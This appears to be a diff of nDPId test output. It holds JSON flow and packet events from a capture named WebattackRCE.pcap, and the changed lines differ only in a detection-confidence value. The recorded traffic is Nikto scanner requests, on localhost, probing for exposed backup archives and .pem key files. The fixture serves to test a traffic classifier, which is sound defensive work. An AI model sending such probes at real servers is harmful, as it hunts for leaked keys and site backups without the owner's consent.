{"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 